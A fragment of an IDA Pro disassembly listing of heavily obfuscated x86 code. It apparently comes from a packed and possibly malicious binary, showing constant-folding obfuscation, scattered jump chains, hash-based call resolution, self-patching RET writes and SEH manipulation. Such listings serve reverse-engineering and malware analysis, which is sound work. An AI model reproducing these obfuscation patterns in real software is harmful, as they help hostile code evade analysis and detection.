; FUNCTION CHUNK AT 00459EAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A4AF SIZE 00000008 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ebx, eax
		pop	eax
		lea	eax, loc_44113C
		jmp	loc_44B729
sub_43A564	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43A576:				; CODE XREF: sub_450434-110C5j
		add	ebx, eax

loc_43A578:				; CODE XREF: sub_450434:loc_44FC42j
		push	5081D46h
		pop	eax
		xor	eax, 44C61AA9h
		jmp	loc_43ED31
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43A589:				; CODE XREF: sub_43F227+16D72j
		cdq
		ror	ebp, 11h
		jbe	loc_452B8E
		jmp	loc_450BAA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43A598:				; CODE XREF: sub_44D2F8:loc_45486Bj
		cmp	dword ptr [ebp-4], 4
		jmp	loc_447D73
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_43A5A1	proc near		; DATA XREF: sub_43CA70:loc_447B44o
		call	nullsub_446
		jmp	ds:dword_41D068
sub_43A5A1	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_446. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	edi, edx
		mov	dword ptr [ecx], 48B5A00h
		and	al, 55h

loc_43A5B7:				; CODE XREF: hvvrg7ie:loc_4563D6j
		jmp	loc_439CCE
; ---------------------------------------------------------------------------
		mov	ds:off_41D11C, eax
		lea	eax, sub_43D809
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D809
; ---------------------------------------------------------------------------
		push	offset sub_43E532
		jmp	loc_446122
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_43A5DA:				; CODE XREF: sub_44CEC8:loc_455D19j
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+10h+var_10]

loc_43A5E0:				; CODE XREF: hvvrg7ie:0045B3A8j
		call	sub_4584F2
		push	790CA047h
		pop	eax
		or	eax, 689F83D9h
		jmp	loc_43C138
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
		mov	ds:off_41D100, eax
		lea	eax, sub_44631F
		mov	byte ptr [eax],	0C3h
		jmp	loc_43B1EA
; ---------------------------------------------------------------------------
		call	nullsub_1
		jmp	ds:dword_41D104
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_43A615:				; CODE XREF: sub_45A234-10EC4j
		jmp	loc_449855
; END OF FUNCTION CHUNK	FOR sub_45A234
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
		db 89h
		dd 0AA7Ah, 124C9E9h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_43A625	proc near		; DATA XREF: sub_44398A+3F5Ao

var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043B4C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044588F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044A257 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B78A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C067 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EADF SIZE 0000000C BYTES

		push	ebx
		push	9253A9C0h
		xchg	esi, [esp+8+var_8]
		mov	ebx, esi
		pop	esi

loc_43A631:				; CODE XREF: sub_44107D-65FCj
		xor	ebx, 541B3AEAh
		add	ebx, 8A36897h
		rol	ebx, 1Eh
		jmp	loc_44588F
sub_43A625	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43A645:				; CODE XREF: sub_442FD1:loc_44A7DAj
		jz	loc_439017
		jmp	loc_43F593
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_43A650:				; CODE XREF: sub_43E60A:loc_4475E7j
		jz	loc_450C47

loc_43A656:				; CODE XREF: hvvrg7ie:loc_4538E6j
		jmp	loc_44985B
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------

loc_43A65B:				; CODE XREF: hvvrg7ie:loc_44C12Dj
		jnz	loc_43F66E
; START	OF FUNCTION CHUNK FOR sub_439873

loc_43A661:				; CODE XREF: sub_439873+1BBDEj
		jmp	loc_44608C
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
		shr	edi, 0Ch
		cmp	ebx, 0CD1338E7h
		jmp	loc_445FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4396DB

loc_43A674:				; CODE XREF: sub_4396DB+21j
					; sub_43E128+6A15j
		xchg	edi, [esp+4+var_4]
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_4396DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_43A67C:				; CODE XREF: sub_4557D4-144D5j
		rol	edx, 3
		or	edx, 8CD75400h
		add	edx, 1145A7E2h
		xchg	edx, [esp+0]
		jmp	loc_44FFAC
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_43A693:				; CODE XREF: sub_45A234:loc_440A83j
		jle	loc_44C826
		test	eax, edi
		jmp	loc_449273
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_43A6A0:				; CODE XREF: sub_43CD0B:loc_44399Cj
					; sub_4447AC:loc_448E33j
		xchg	ebx, [esp+0]
		jmp	loc_453986
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_43A6A8:				; CODE XREF: sub_44D47A-E908j
		test	ebx, 485DD0F7h
		jmp	loc_45AC80
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43A6B3:				; CODE XREF: sub_445CCD+1FD7j
		jz	loc_45A9CE
		jmp	loc_4422FC
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_43A6BE:				; CODE XREF: hvvrg7ie:loc_443A9Aj
		adc	eax, edi
		jbe	loc_43FEA1
		jmp	loc_4548A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43A6CB:				; CODE XREF: hvvrg7ie:00445456j
					; sub_45038B:loc_44666Ej
		jnz	loc_45581B
		jmp	loc_4522D9
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447610

loc_43A6D6:				; CODE XREF: sub_447610-A0EAj
		pop	edx
		test	eax, 34D52039h
		jmp	loc_458E78
; END OF FUNCTION CHUNK	FOR sub_447610
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43A6E2:				; CODE XREF: sub_450246+8j
		push	8B789E5Eh
		pop	ebx
		sub	ebx, 0BCA7BA55h
		add	ebx, 5BA16FEDh
		add	ebx, edx
		jmp	loc_4518A9
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_43A6FB:				; CODE XREF: sub_452F78:loc_45B340j
		jz	loc_43CC87
		jmp	loc_446766
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_43A706:				; CODE XREF: sub_449D38+16j
		shl	eax, cl
		and	edx, eax
		setnz	byte ptr [ebp-5]
		call	sub_44D2C6
		push	0BAECE876h
		pop	edx
		jmp	loc_4438CA
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------

loc_43A71E:				; CODE XREF: hvvrg7ie:0044D5AEj
		jb	loc_43E595
		ror	esi, 0Eh
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_43A727:				; CODE XREF: sub_45B048:loc_44D589j
		xor	eax, ds:4000F9h
		add	eax, 0E5E6A38Dh
		jmp	loc_44ED6E
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
		mov	eax, 2D912001h
		call	sub_450C5A
		mov	ds:dword_41D14C, eax
		lea	eax, nullsub_494
		jmp	loc_443030
; ---------------------------------------------------------------------------

loc_43A753:				; CODE XREF: hvvrg7ie:0045601Aj
		pop	ebx
		push	0
		push	0D43E1268h
		xchg	edx, [esp]
		mov	eax, edx
		jmp	loc_43F62F
; ---------------------------------------------------------------------------

loc_43A765:				; DATA XREF: hvvrg7ie:00441521o
		push	edi

loc_43A766:				; CODE XREF: hvvrg7ie:004410CBj
		mov	edi, esi
		xchg	edi, [esp]
		push	0D24204E2h
		pop	esi
		jmp	loc_45B4B8
; ---------------------------------------------------------------------------

loc_43A776:				; DATA XREF: hvvrg7ie:0044B579o
		call	sub_44BF66
		mov	ds:dword_448D10, eax
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	0CFC33887h
		pop	eax
		jmp	loc_451CB5
; ---------------------------------------------------------------------------

loc_43A791:				; CODE XREF: hvvrg7ie:00444171j
		jz	loc_45A27B
; START	OF FUNCTION CHUNK FOR sub_440603

loc_43A797:				; CODE XREF: sub_440603+192BAj
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_440603
; ---------------------------------------------------------------------------
		push	edx
		and	eax, ebx
		jmp	loc_45A279
; ---------------------------------------------------------------------------

loc_43A7A4:				; CODE XREF: hvvrg7ie:004422A3j
		cmp	ecx, 2E60BDCDh
		jmp	loc_449D0B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_302. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_43A7B0:				; CODE XREF: sub_44E4A6+1j
		jmp	loc_452953
; END OF FUNCTION CHUNK	FOR sub_44E4A6

; =============== S U B	R O U T	I N E =======================================



sub_43A7B5	proc near		; CODE XREF: hvvrg7ie:0044FA32j
					; sub_456763+7p

; FUNCTION CHUNK AT 00456753 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456E7D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004591E4 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	large fs:0, esp
		mov	eax, [eax]

loc_43A7C2:				; CODE XREF: hvvrg7ie:loc_43C795j
		jmp	loc_4591E4
sub_43A7B5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_43A7C7:				; CODE XREF: sub_44543A+36E5j
		test	ebx, ebp
		jmp	loc_44178E
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43A7CE:				; CODE XREF: sub_454099:loc_454178j
		ja	loc_450DE2
		cdq
		jmp	loc_4427CE
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_43A7DA:				; CODE XREF: sub_439FEE:loc_443C2Cj
		or	eax, 36B53473h
		add	eax, 0A6651309h
		add	eax, ebp
		push	esi
		push	0BC57349Eh
		pop	esi
		jmp	loc_445237
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43A7F4:				; CODE XREF: sub_43A839:loc_43FEECj
		jb	loc_447A78
		add	ebx, esi
		mov	edx, [ecx]
		cmp	edi, ecx
		jmp	loc_454984
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43A805:				; CODE XREF: sub_4465A6-AB7Dj
		mov	eax, [esp+0]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	sub_43C811
		mov	eax, 6E103E68h
		call	sub_450C5A
		jmp	loc_446884
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_43A822:				; CODE XREF: sub_452265+5BBFj
		shr	eax, 0Ch
		jno	loc_440A3C
		xchg	ebp, [ebx]

loc_43A82D:				; CODE XREF: sub_4589D3:loc_43FB4Aj
					; sub_452265:loc_446DD8j
		push	ecx
		push	0EBDA4713h
		pop	ecx
		jmp	loc_44907E
; END OF FUNCTION CHUNK	FOR sub_452265

; =============== S U B	R O U T	I N E =======================================



sub_43A839	proc near		; CODE XREF: sub_44A4D4+Dj

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h

; FUNCTION CHUNK AT 0043A7F4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CA26 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CC4A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CE48 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043DF85 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F5B0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043FEEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444EFD SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00446BE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447A78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448716 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044887C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A280 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A822 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C58C SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044CB7A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044FAF1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00451A91 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 00452183 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453FE1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454984 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455FB5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045636A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457CA2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045AB17 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045B390 SIZE 00000005 BYTES

		add	esp, 0FFFFFFE0h
		push	0B935F4BAh
		pop	eax
		and	eax, 0B9B831Bh
		or	eax, 1A1866F1h
		jmp	loc_448716
sub_43A839	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E72F

loc_43A853:				; CODE XREF: sub_44E72F+11j
		mov	[ebp-4], eax
		mov	eax, [ebp-14h]
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-20h]
		movzx	eax, byte ptr [eax]
		mov	[ebp-1Ch], eax
		jmp	loc_43E71C
; END OF FUNCTION CHUNK	FOR sub_44E72F

; =============== S U B	R O U T	I N E =======================================



sub_43A86A	proc near		; DATA XREF: sub_451E1C-131B1o

; FUNCTION CHUNK AT 00450B79 SIZE 00000005 BYTES

		xor	[ebp-0Ah], al
		inc	dword ptr [ebp-8]
		inc	dword ptr [ebp-4]
		jmp	loc_450B79
sub_43A86A	endp


; =============== S U B	R O U T	I N E =======================================



sub_43A878	proc near		; CODE XREF: sub_454463:loc_449105p
		mov	eax, 0EAh
		retn
sub_43A878	endp


; =============== S U B	R O U T	I N E =======================================



sub_43A87E	proc near		; CODE XREF: sub_458F33-1FADFj
					; sub_43D285:loc_439FB7p ...

; FUNCTION CHUNK AT 00453BF9 SIZE 00000005 BYTES

		jnb	sub_44107D
		jmp	loc_453BF9
sub_43A87E	endp

; ---------------------------------------------------------------------------
		sbb	edx, edi
		jmp	loc_4595B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_43A890:				; CODE XREF: sub_455B9C:loc_43900Cj
		call	sub_44616F

loc_43A895:				; CODE XREF: sub_45A6E4-5AB9j
		jmp	nullsub_218
; END OF FUNCTION CHUNK	FOR sub_455B9C

; =============== S U B	R O U T	I N E =======================================



sub_43A89A	proc near		; CODE XREF: sub_4593B5j
					; DATA XREF: sub_443E56+15555o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D519 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442FE3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444F9A SIZE 00000015 BYTES

		push	8832E419h
		pop	ebx
		add	ebx, 203BD074h
		or	ebx, 0C69484A3h
		jmp	loc_442FE3
sub_43A89A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_43A8B1:				; CODE XREF: hvvrg7ie:00453F3Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43A8B2:				; CODE XREF: sub_4403B6+C9C2j
		jmp	loc_44A61F
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_43A8B7:				; CODE XREF: sub_43EBB6+15j
		jmp	loc_446B8A
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43A8BD:				; DATA XREF: sub_43BDCF:loc_442E10o
		test	al, al
		jz	nullsub_321
		jmp	loc_43C8BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_43A8CA:				; CODE XREF: sub_43A0EC+1D09Dj
		sbb	esi, edx
		not	ecx
		xor	eax, 3BCAF32Ah
		jmp	loc_4509BD
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_43A8D9:				; CODE XREF: sub_452AA0:loc_43B2D9j
					; sub_452AA0-F73Bj
		push	esi
		push	0E8179112h
		pop	esi
		rol	esi, 3
		xor	esi, 0D6A407Ch
		sub	esi, 6A1C5C46h
		rol	esi, 1Dh
		jmp	loc_443D21
; END OF FUNCTION CHUNK	FOR sub_452AA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43A8F7:				; CODE XREF: sub_450AA8:loc_44E081j
		jnz	loc_43D9DE
		adc	eax, edi
		pop	esi
		sbb	eax, esi
		jmp	loc_43D9DD
; END OF FUNCTION CHUNK	FOR sub_450AA8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447331

loc_43A908:				; CODE XREF: sub_447331+Bj
		add	eax, 0AAB7E3CBh
		and	eax, 3C4C0D63h
		xor	eax, 32EEB95Eh
		add	eax, ebp
		push	ebx
		push	0DD1829BEh
		pop	ebx
		jmp	loc_4533C5
; END OF FUNCTION CHUNK	FOR sub_447331
; ---------------------------------------------------------------------------
		push	edx
		push	1AEE95ADh
		pop	edx
		sub	edx, 4EA259DAh
		or	edx, 7C9B599Bh
		cmp	edx, 3ACDB21h
		jmp	loc_4487B6
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D130
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_495. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jns	loc_44E1C0
		mov	eax, [esp]
		push	edx
		jmp	loc_439087
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_43A95D:				; CODE XREF: sub_4557D4+13j
		jmp	loc_440FD7
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_43A962:				; CODE XREF: sub_43D16B+21B9j
		jmp	loc_441E6F
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
		db 9
dword_43A968	dd 0			; DATA XREF: hvvrg7ie:00457333r
					; hvvrg7ie:loc_4596F3r	...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B35B

loc_43A96C:				; CODE XREF: sub_43B35B+143BFj
		jmp	nullsub_114
; END OF FUNCTION CHUNK	FOR sub_43B35B
; ---------------------------------------------------------------------------

loc_43A971:				; CODE XREF: hvvrg7ie:0044F566j
		jmp	loc_44E11F
; ---------------------------------------------------------------------------
		dw 2ABBh
dword_43A978	dd 0AF646A5Dh, 0C8E2C833h ; DATA XREF: sub_449785+4o
					; hvvrg7ie:0044DD38o
		db 0C6h, 6Ch, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_43A983:				; CODE XREF: sub_456CD4-58F3j
		jmp	loc_43D7C2
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
		jo	loc_45621E
		push	5EFEA8A3h
		pop	edx
		rol	edx, 3
		jmp	loc_44A183
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_517. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43A99D:				; DATA XREF: sub_443E84+13DB7o
		push	eax
		push	esi
		push	5E0C7E0Fh
		pop	esi
		sub	esi, 0AC0BDC43h
		xor	esi, 0D9B11D07h
		add	esi, 94925B2Eh
		xchg	esi, [esp]
		jmp	sub_4584F2
; ---------------------------------------------------------------------------

loc_43A9BF:				; CODE XREF: hvvrg7ie:00459605j
		jo	loc_43E85F

loc_43A9C5:				; CODE XREF: hvvrg7ie:00455C61j
		add	edi, 4485A8CAh
		mov	[edi], eax
		pop	edi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E532

loc_43A9CF:				; CODE XREF: sub_43E532:loc_43FD6Ej
		add	esi, 9212C96Dh
		xchg	esi, [esp+4+var_4]
		jmp	loc_43A3FA
; END OF FUNCTION CHUNK	FOR sub_43E532
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D120
; ---------------------------------------------------------------------------

loc_43A9E3:				; CODE XREF: hvvrg7ie:00444010j
		jmp	loc_45A1C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_493. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	[esi+ebx*8-74A5FFFFh], edx
		add	al, 24h
		jmp	loc_43A3F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_43A9F7:				; CODE XREF: sub_451E6D-18A7j
		call	sub_44440B

loc_43A9FC:				; CODE XREF: sub_448FB0+10j
		jmp	loc_457560
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_43AA01:				; CODE XREF: sub_44934B-9346j
		jmp	loc_44F2AD
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------

loc_43AA06:				; CODE XREF: hvvrg7ie:00439D36j
		jmp	locret_447E80
; ---------------------------------------------------------------------------
		call	sub_44DE0A
		push	0D72D6339h
		pop	edx
		add	edx, 0ED4256Fh
		xor	edx, 7E6A65A4h
		add	edx, 59F0CC43h
		jmp	loc_4564D2

; =============== S U B	R O U T	I N E =======================================



sub_43AA2D	proc near		; CODE XREF: sub_444BE1-64D4p
					; hvvrg7ie:00452750j

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		add	ecx, 0F4539E7Dh
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_446A16
sub_43AA2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D9F9

loc_43AA3F:				; CODE XREF: sub_43D9F9+B5B0j
		xchg	esi, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43D9F9
; ---------------------------------------------------------------------------

locret_43AA47:				; CODE XREF: hvvrg7ie:loc_450652j
		retn
; ---------------------------------------------------------------------------

loc_43AA48:				; CODE XREF: hvvrg7ie:00454639j
		jmp	loc_43B60F
; ---------------------------------------------------------------------------

loc_43AA4D:				; CODE XREF: hvvrg7ie:loc_453AD9j
		rol	eax, 1Ah
		push	ecx
		xor	ecx, 69614364h
		jmp	loc_43B7A1
; ---------------------------------------------------------------------------
		push	offset sub_43A3D5
		jmp	loc_443984
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_460. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43AA67:				; CODE XREF: hvvrg7ie:004581DCj
		movzx	eax, word ptr [eax]
		shl	eax, 2
		mov	edx, [ebp-14h]
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_43AA70:				; CODE XREF: sub_44107D+19906j
		mov	edx, [edx+1Ch]
		add	edx, [ebp-4]
		add	eax, edx
		mov	eax, [eax]
		call	sub_4529EA

loc_43AA7F:				; CODE XREF: hvvrg7ie:loc_449848j
		xchg	edi, [ecx]
		jp	loc_43A631
		push	0DCDE9A6Ch
		ror	ebx, 1Eh
		jmp	loc_44F3FB
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43AA94:				; CODE XREF: sub_43D285+7278j
		sub	ecx, 7D4A24BFh
		and	ecx, 0DA122ED8h
		xor	ecx, 0A4138635h
		add	ecx, ebp
		add	ecx, 13EC710Fh
		jmp	loc_442259
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_43AAB3:				; CODE XREF: sub_44398A+1535Cj
		jnz	loc_45AC42
		jmp	loc_444B0A
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4452F2

loc_43AABE:				; CODE XREF: sub_4452F2+12F5Ej
		pop	ebx
		add	esi, 2098E38h
		or	esi, 5F12C56Eh
		xor	esi, 63B52757h
		xor	eax, esi
		jmp	loc_44C444
; END OF FUNCTION CHUNK	FOR sub_4452F2
; ---------------------------------------------------------------------------
		adc	ebp, 450CC659h
		jmp	sub_45B8B1
; ---------------------------------------------------------------------------

loc_43AAE3:				; CODE XREF: hvvrg7ie:00459C51j
		push	ecx

; =============== S U B	R O U T	I N E =======================================



sub_43AAE4	proc near		; CODE XREF: sub_45B3FF:loc_44BAA6p

; FUNCTION CHUNK AT 0043DE2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E6CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004522A3 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045817F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B45C SIZE 00000021 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	edx, [ebp-1Ch]

loc_43AAEB:				; CODE XREF: sub_4405D7:loc_451A80j
		jmp	loc_43DE2B
sub_43AAE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43AAF0:				; CODE XREF: hvvrg7ie:0045715Aj
		ja	loc_43EB3E
		shl	ebx, 5
		jb	loc_443DD0
		xor	ecx, ebp
		jmp	loc_4482AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_43AB06:				; CODE XREF: sub_448663+CB2Cj
		pop	edi
		sub	edi, 92201916h
		xor	edi, 23F7141h
		xor	eax, edi

loc_43AB15:				; CODE XREF: hvvrg7ie:0044530Fj
		pop	edi
		add	eax, 0D83105D5h
		push	ecx
		jmp	loc_43D74B
; END OF FUNCTION CHUNK	FOR sub_448663

; =============== S U B	R O U T	I N E =======================================



sub_43AB22	proc near		; DATA XREF: sub_450D8D-171F5o
		push	eax
		cmp	dword ptr [ebp-14h], 6
sub_43AB22	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43AB27:				; CODE XREF: sub_43C0DE:loc_442E65j
		setz	al
		call	sub_447079
		pop	ecx
		shl	eax, 3
		jmp	loc_4454E7
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		mov	eax, 729645CDh
		call	sub_44059F
		mov	ds:off_41D040, eax
		lea	eax, sub_44A2AF
		mov	byte ptr [eax],	0C3h
		jmp	sub_44A2AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44412E

loc_43AB56:				; CODE XREF: sub_44412E:loc_452DA6j
		mov	eax, [eax]
		push	offset sub_44C6D7
		jmp	nullsub_214
; END OF FUNCTION CHUNK	FOR sub_44412E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F8F2

loc_43AB62:				; CODE XREF: sub_44F8F2+3j
		jnz	loc_44D94A
		jmp	loc_449C4D
; END OF FUNCTION CHUNK	FOR sub_44F8F2
; ---------------------------------------------------------------------------

loc_43AB6D:				; CODE XREF: hvvrg7ie:00449486j
					; hvvrg7ie:00449494j
